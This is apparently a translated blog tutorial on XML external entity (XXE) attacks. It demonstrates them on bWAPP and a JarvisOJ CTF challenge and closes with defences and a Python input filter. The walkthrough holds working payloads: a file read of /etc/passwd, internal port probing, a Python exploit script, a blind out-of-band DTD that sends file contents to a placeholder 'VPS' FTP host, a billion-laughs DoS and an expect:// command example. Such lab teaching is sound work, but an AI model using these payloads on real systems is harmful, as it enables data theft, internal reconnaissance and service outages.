0x00, XXE vulnerability attack examples
Attack ideas:
1. External entity reference: local and remote file reads (with echo)
2. Blind XXE
3. DoS
0x01, External entity reference, with echo
Experimental platform: the XXE challenge on bWAPP
Challenge:
Capture a request: click the "Any bugs?" button and intercept the request, which looks as follows:
You can see that the xxe-1.php page sends XML data to the xxe-2.php page with a POST request.
Since it is XML, we can declare a malicious external entity ourselves and then reference that entity inside the original XML data to carry out the XXE attack.
Payload to read the system password file:
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE note [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><reset><login>&xxe;</login><secret>Any bugs?</secret></reset>
Payload to read an arbitrary file under the site directory:
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE note [<!ENTITY xxe SYSTEM "http://127.0.0.1/bWAPP/robots.txt">]><reset><login>&xxe;</login><secret>Any bugs?</secret></reset>
To deepen understanding, look at the source code of xxe-2.php.
The main code:
You can see that the simplexml_load_string() function is used directly here.
simplexml_load_string() loads an XML string into an object, and it receives the XML content without any filtering. $login takes the contents of the login tag, which is then concatenated into $message and displayed on the screen.
Intranet port detection payload:
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE note [<!ENTITY xxe SYSTEM "http://127.0.0.1:80">]><reset><login>&xxe;</login><secret>Any bugs?</secret></reset>
If port 80 is open, the following error message is echoed:
If the port is not open, the following is displayed:
Using Python to write a simple exploit script; test it as follows:
# coding=utf-8
# Python 2 script (raw_input / print statement). The original also re-encoded the
# prompt strings to GBK for a Chinese Windows console; that is unnecessary here.
import requests

if __name__ == '__main__':
    payload = raw_input('Enter the resource you want XXE to fetch, e.g. file:///etc/passwd\npayload: ')
    url = 'http://192.168.31.195/bWAPP/xxe-2.php'
    headers = {'Content-Type': 'text/xml'}
    # Session cookie and security level of the bWAPP test instance
    cookies = {'PHPSESSID': '4e2c24a64c85a86bc69b09736828af9b', 'security_level': '0'}
    # Declare the external entity "test" pointing at the requested resource and
    # reference it inside the login tag, whose content xxe-2.php echoes back
    xml = ('<?xml version="1.0" encoding="UTF-8"?>'
           '<!DOCTYPE copyright [<!ENTITY test SYSTEM "' + payload + '">]>'
           '<reset><login>&test;</login><secret>login</secret></reset>')
    r = requests.post(url, headers=headers, cookies=cookies, data=xml)
    print 'XXE attack return result:'
    print r.content
Result:
Let's look further at the medium- and high-security-level source code of this XXE challenge:
// disables XML external entities. Doesn't work with older PHP versions!
libxml_disable_entity_loader(true);

$xml = simplexml_load_string($body);

// Debugging
// print_r($xml);

// login now comes from the session, not from the XML
$login = $_SESSION["login"];
$secret = $xml->secret;

if ($secret) {
    $secret = mysqli_real_escape_string($link, $secret);
    $sql = "UPDATE users SET secret = '" . $secret . "' WHERE login = '" . $login . "'";

    // Debugging
    // echo $sql;

    $recordset = $link->query($sql);

    if (!$recordset) {
        die("Connect Error: " . $link->error);
    }

    $message = $login . "'s secret has been reset!";
} else {
    $message = "An error occurred!";
}
As the analysis shows, $login is now taken directly from the session and is no longer submitted via XML, and mysqli_real_escape_string() is used to escape special characters in $secret.
Example two:
A challenge on JarvisOJ: API call
The goal of this challenge is to obtain the flag in /home/ctf/flag.txt on the target machine.
Open the challenge at http://web.jarvisoj.com:9882/ and find an input box; we capture the request.
It is a JSON submission; after modifying the data we find that it is still parsed.
This is an XXE challenge. How do we get the flag? Simply change the JSON to XML and then submit the XML document.
0x02, Blind XXE
If the server does not echo anything, you can only exploit blind XXE by constructing an out-of-band (OOB) channel to read the data.
So, how do we use XXE without echo?
Idea:
1. The client sends payload 1 to the web server
2. The web server fetches a malicious DTD from the VPS and performs the file read (payload 2)
3. The web server sends the result to a specific FTP or HTTP service on the VPS
4. The result is received on the VPS (nc listening on the port)
Local client (payload 1):
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % remote SYSTEM "http://vps/test.xml"> %remote;]>
Because the web side will decode it, we first need to HTML-entity-encode it once (the % of the nested declaration is written as &#37;).
Payload 2 is the content of test.xml (on the VPS):
<!ENTITY % payload SYSTEM "file:///etc/passwd"><!ENTITY % int "<!ENTITY &#37; trick SYSTEM 'ftp://VPS:21/%payload;'>">%int;%trick;
First, the contents of the file (read via the file:// protocol) are assigned to the parameter entity %payload; the second step nests the entities, so that trick accesses the remote FTP service with those contents in the URL.
0x03, DoS
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
The principle is recursive references: the lol entity is the string "lol", the lol2 entity references 10 lol entities, and the lol3 entity references 10 lol2 entities, so one lol3 entity already contains 10^2 "lol" strings. Continuing in this way, the lol9 entity contains 10^8 "lol" strings, and finally lol9 is referenced in the document.
0x04, Command execution
In a PHP environment, command execution through XML requires the PHP expect extension, which is not installed by default, so in practice it is rarely exploitable; the code is given here only for reference:
<?php
$xml = <<<EOF
<?xml version="1.0"?>
<!DOCTYPE any [<!ENTITY f SYSTEM "expect://ls">]>
<x>&f;</x>
EOF;
$data = simplexml_load_string($xml);
print_r($data);
?>
0x05, Defending against XXE
Disable external entities with the facilities of the development language:
PHP:
libxml_disable_entity_loader(true);
Java:
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setExpandEntityReferences(false);
Python:
from lxml import etree
etree.parse(xmlsource, etree.XMLParser(resolve_entities=False))
Filter user-supplied XML data
Filter the keywords <!DOCTYPE and <!ENTITY, or SYSTEM and PUBLIC.
Do not allow the XML to contain its own DTD definitions.
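The following is an added example, not code from the original post or from bWAPP, that implements the keyword-filter defence described above in Python using only the standard library, and contrasts it with the unfiltered simplexml_load_string() call analysed in 0x01. It refuses any document carrying a DOCTYPE or ENTITY declaration (SYSTEM and PUBLIC can only occur inside a DTD, so refusing the DTD covers them too), and it fails closed on the inputs that defeat a naive byte-string keyword match: UTF-16 input and NUL bytes. It assumes the endpoint accepts UTF-8 only; the tag names reset/login/secret mirror the bWAPP challenge, and the sample requests are constructed for the example. The filter is a second line of defence that complements, not replaces, disabling entity loading in the parser as shown for PHP, Java and Python above.

```python
"""Reject user-supplied XML that carries a DTD before it reaches the parser."""
import re
import xml.etree.ElementTree as ET

# Any DOCTYPE (and therefore any ENTITY declaration) is refused. The check is
# case-insensitive and tolerates whitespace after "<!" so that "<! doctype"
# does not slip past it.
_DTD_MARKER = re.compile(r"<!\s*(?:DOCTYPE|ENTITY)\b", re.IGNORECASE)

# Constructed sample requests in the shape of the bWAPP xxe-2.php body.
CLEAN_REQUEST = (b'<?xml version="1.0" encoding="UTF-8"?>'
                 b'<reset><login>bee</login><secret>Any bugs?</secret></reset>')
XXE_REQUEST = (b'<?xml version="1.0" encoding="UTF-8"?>'
               b'<!DOCTYPE note [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
               b'<reset><login>&xxe;</login><secret>Any bugs?</secret></reset>')


class UnsafeXML(ValueError):
    """Raised when the document would require DTD or entity processing."""


def check_untrusted_xml(raw):
    """Return the decoded text if it carries no DTD, otherwise raise UnsafeXML.

    `raw` is bytes or str. Bytes must decode as UTF-8 (assumption: the endpoint
    accepts UTF-8 only), so a UTF-16 payload, with or without a byte order
    mark, is refused instead of being waved through by a keyword search that
    never sees "<!DOCTYPE" in the interleaved bytes.
    """
    if isinstance(raw, bytes):
        if raw.startswith((b"\xff\xfe", b"\xfe\xff")):
            raise UnsafeXML("UTF-16 byte order mark: non-UTF-8 input refused")
        try:
            text = raw.decode("utf-8")
        except UnicodeDecodeError:
            raise UnsafeXML("input is not valid UTF-8")
    else:
        text = raw
    if "\x00" in text:
        # XML forbids U+0000; its presence usually means BOM-less UTF-16.
        raise UnsafeXML("NUL byte in input")
    if _DTD_MARKER.search(text):
        raise UnsafeXML("DOCTYPE/ENTITY declaration in user-supplied XML")
    return text


def is_safe_xml(raw):
    """Boolean form of check_untrusted_xml for callers that only need a verdict."""
    try:
        check_untrusted_xml(raw)
    except UnsafeXML:
        return False
    return True


def parse_reset_request(raw):
    """Parse a <reset><login/><secret/></reset> body and return (login, secret).

    The keyword check runs first; the stdlib expat parser is then used with no
    external-entity handler installed, and values are read by fixed tag names.
    An undeclared entity reference in the body surfaces as an ET.ParseError.
    """
    text = check_untrusted_xml(raw)
    root = ET.fromstring(text)
    if root.tag != "reset":
        raise UnsafeXML("unexpected root element %r" % root.tag)
    return root.findtext("login", default=""), root.findtext("secret", default="")


if __name__ == "__main__":
    print("clean request  ->", parse_reset_request(CLEAN_REQUEST))
    for label, sample in [("xxe request", XXE_REQUEST),
                          ("utf-16 xxe", XXE_REQUEST.decode("utf-8").encode("utf-16")),
                          ("lowercase doctype", XXE_REQUEST.replace(b"DOCTYPE", b"doctype"))]:
        print("%-18s -> safe=%s" % (label, is_safe_xml(sample)))
```

In PHP the same pre-check would sit in front of simplexml_load_string($body) in xxe-2.php; since the check works on the raw request body it is independent of which parser follows it, which is why it is useful as a backstop on older PHP versions where libxml_disable_entity_loader() is unavailable.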
[Web Security] XXE vulnerability learning (part 2)